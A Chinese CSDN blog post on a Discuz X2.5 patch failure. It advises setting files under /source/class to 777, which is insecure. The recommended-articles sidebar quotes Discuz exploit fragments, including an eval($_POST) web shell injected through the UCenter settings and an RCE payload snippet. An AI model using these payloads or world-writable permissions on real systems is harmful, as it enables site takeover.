Discuz X2.5 漏洞修复失败,发现您的目录及文件无修改权限

最新推荐文章于 2021-06-22 14:52:48 发布
最新推荐文章于 2021-06-22 14:52:48 发布
阅读量1.6k 收藏
点赞数
分类专栏: Discuz
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shadou0109/article/details/8820070
版权

Discuz X2.5 最新发布的两个漏洞,如果点击修复按钮失败后,出现了

现您的目录及文件无修改权限,请您填写ftp账号,或者修改文件权限的问题。

解决方案:

如果是远程服务器的话,登录ftp ,修改/source/class文件夹下所有文件的权限,由755改为777.记得所有的权限都修改为777。

然后加上discuz_version.php权限755->777.(这个不知道可不可以)

之前class文件夹下所有的权限都改为了777还是失败了。


修改权限后,回到网站后台,点击修复。一般能正常修复成功的。 :)

shadou0109
关注
专栏目录
discuz漏洞更新提示目录文件修改权限
孤城烟雨话凄凉
03-27 1428
Discuz 提示有漏洞需要更新,但更新时却提示: 发现您的目录文件修改权限,请您填写ftp账号,或者修改文件权限为可读可写后重试 解决方法如下: 因为我遇到好几次这类错误; 所以具体到给哪个文件权限是不确定的; 最好是根据补丁的的路径去赋予文件相应的777的权限
DiscuzX2.5 结构字典 目录结构
清风古韵
06-24 489
DiscuzX2.5数据库字典 http://www.discuzt.com/discuzcode-db.htmlDiscuzX2.5完整目录结构注释!全局索引篇http://www.discuzt.com/discuzcode-dir_index.htmlDiscuzX2.5完整目录结构【模板目录template】http://www.discuzt.com/discuzcode-dir_tem
discuzX3.2 X3.4网站漏洞修复 SQL注入与请求伪造攻击利用与修复
网站安全专家
12-10 9616
2018年12月9日,国内某安全组织,对discuz X3.2 X3.4版本的漏洞进行了公开,这次漏洞影响范围较大,具体漏洞discuz 的用户前段SQL注入与请求伪造漏洞,也俗称SSRF漏洞漏洞产生的原因首先:php环境的版本大约PHP5.2,dizcuzX3.2 X3.4版本,服务器环境是windows 2008 2003 2012系统,linux centos不受此漏洞的影响。 漏...
Discuz! X2.5 最新GetShell0day 详细利用
weixin_33970449的博客
12-07 695
Discuz! X2.5 最新GetShell0day 详细利用听说Discuz!这次又出漏洞了,这次还是个GetShell漏洞呀。这个漏洞比较新,应该很多站还没更新吧。影响版本有:20120407,beta,rcDiscuz! X2.5 Release 20120407版中的preg_replace使用了e修饰符和双引号,在实现上存在远程命令执行漏洞,远程***者可利用此漏...
Discuz2.5-3.4任意文件删除漏洞分析
老北京砸酱锤的博客
06-22 610
Discuz!X ≤3.4 任意文件删除漏洞 Discuz!X社区软件,是一个采用 PHP 和 MySQL 等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台。 2017年9月29日,Discuz!修复了一个安全问题用于加强安全性,这个漏洞会导致前台用户可以导致任意删除文件漏洞修复建议 升级到最新版本的 Discuz! 实验环境 操作机:centos7 目标地址:192.168.0.105 Discuz版本:3.1 实验步骤 步骤1:了解原理 该漏洞于2014年6.
解决:Discuz提示 目录未找到或者无法访问: ./data/template
luo729192816的博客
06-06 3117
笔者环境 centos7.7 最小安装,discuz3.4,点击注册或者其他功能的时候提示 起初一直认为单纯是目录权限问题,已经给了777权限,访问还是报错,网上查了很多资料,都是说权限问题,我全部都给了777的权限,但是还是没有解决; 原因,就是开启了SELinux导致: 这个命令检查getenforce 解决办法:必须关闭SELinux 1.临时关闭: setenforce 0 ##设置SELinux 成为permissive模式 2.临时开启: setenforce 1 ##设置
Discuz后台拿shell X2.5后台shell
收集盒 Book box
12-20 1280
第一:我们进入后台已创始人身份 然后打开站长UC设置   在UCip地址里面填写 经过处理的一句话如下  Madman\\');eval($_POST[a]) ? ;// QQ  然后保存 连接地址: www.xxx.com/config/config_ucenter.php 成功连接
[反馈BUG] Discuz! X1.5 BUG 修复方法(基于 20110121 版本)
weixin_30919235的博客
03-08 67
http://www.discuz.net/thread-2040599-1-1.html 转载于:https://www.cnblogs.com/xiaochaohuashengmi/archive/2011/03/08/1976870.html
DZ(discuz) x2.5 爆路径漏洞
收集盒 Book box
11-20 2655
/* just for search DZ x2.5 爆路径 绝对路径 dzx2.5爆路径 dz2.5爆路径 dz x.25 Dz x.25 DZ 2.5 */ 白肚 & 股沟 没找到dzx2.5的爆路径的漏洞 遂拿自己写的那个白盒测试挖洞辅助工具 果断秒杀之 发出来共享之 爆路径文件如下: /uc_server/control/admin/db.php /source/plug
安装 DiscuzX2.5 出现 you don't have permission to access /install on this server
生活乱码
06-08 2118
最近几天新装了个Fedora 17的虚拟机,准备在上面做一些php方面的测试工作。 由于有yum保驾护航,LAMP环境的安装没有出现太多的波澜。如果有需要的话,除了service启动方式有所改变,大体上都可以参照以下教程, http://www.iroowe.com/?p=478service的启动方式如下 sudo service mysqld startsudo service http
实验吧_网站综合渗透_Discuz!
test
10-21 1万+
前言 这个一个实验吧中的环境,分值为50分,下面是题目说明。诶,发现自己很菜。 你是国内一流安全公司的“安全专家”,你带领的团队负责维护国内某金融网站的安全,马上临近双十一购物节,客户要求你对重点保障网站进行“授权安全检查”,希望你能找到网站的漏洞。 操作机器IP:192.168.1.2 目标机器IP:192.168.1.3 题目说明 1、 在不影响客户业务的前提下,你对网站进行了“应用安全...
Discuz! X2.5 远程代码执行漏洞及EXP[XDAY]
oceanark的博客
07-13 2685
----------- 首先膜拜大牛的共享精神,我淫比较懒试了几个站都没成功就不弄了,但有人说成功了,不知道是PR问题还是补丁了   正文:前面省略一万+字。。。。 利用方法 1.注册任意账户 2.登陆用户,发表blog日志(注意是日志) 3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),
浅谈“宽字节注入”
→_→
05-19 357
漏洞名称: 宽字节注入 描述: 宽字节注入是相对于单字节注入而言的,该注入跟HTML页面编码无关,宽字节注入常见于mysql中,GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的宽字节,实际上只有两字节。宽字节带来的安全问题主要是吃ASCII字符(一字节)的现象,当%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠\,变成了 %df\’,其中\的十六进制是 %5C ,那么现在 %df\’ = %df%5..
discuz漏洞汇总
热门推荐
hacker0ne的博客
05-05 5万+
Discuz漏洞拿服务器 路径泄露 ‘api/addons/zendcheck.php’, ‘api/addons/zendcheck52.php’, ‘api/addons/zendcheck53.php’, ‘source/plugin/mobile/api/1/index.php’, ...
java-ssm+vue旅游资源网站实现源码(项目源码-说明文档)
最新发布
09-18
旅游资源网站的主要使用者分为管理员和用户,实现功能包括管理员:首页、个人中心、用户管理、景点信息管理、购票信息管理、酒店信息管理、客房类型管理、客房信息管理、客房预订管理、交流论坛、系统管理,用户:首页、个人中心、购票信息管理、客房预订管理、我的收藏管理,前台首页;首页、景点信息、酒店信息、客房信息、交流论坛、红色文化、个人中心、后台管理、客服等功能。 项目关键技术 开发工具:IDEA 、Eclipse 编程语言: Java 数据库: MySQL5.7+ 后端技术:ssm 前端技术:Vue 关键技术:springboot、SSM、vue、MYSQL、MAVEN 数据库工具:Navicat、SQLyog
【高创新】基于粒子群优化算法PSO-Transformer-BiLSTM实现故障识别Matlab实现.rar
09-18
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手
这里收集那些神奇的产品经理为我们带来的意想不到的产品功能和改版,又称_MDZZ_PM_awesome-pm.zip
09-18
这里收集那些神奇的产品经理为我们带来的意想不到的产品功能和改版,又称_MDZZ_PM_awesome-pm
AI City track 5数据集-voc-xml格式
09-18
有戴头盔的人、未戴头盔的人、摩托车三种类别,包含736张图像、对应voc格式标签(xml)
Discuz! X1.5程序结构详解:目录文件与模板
X1.5的程序目录文件列表及模板文件结构说明" Discuz! X1.5 是一个社区建站平台,它将论坛(BBS)、社交网络(SNS)、门户(Portal)、群组(Group)以及开放平台(Open Platform)融为一体,旨在为用户提供一站...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值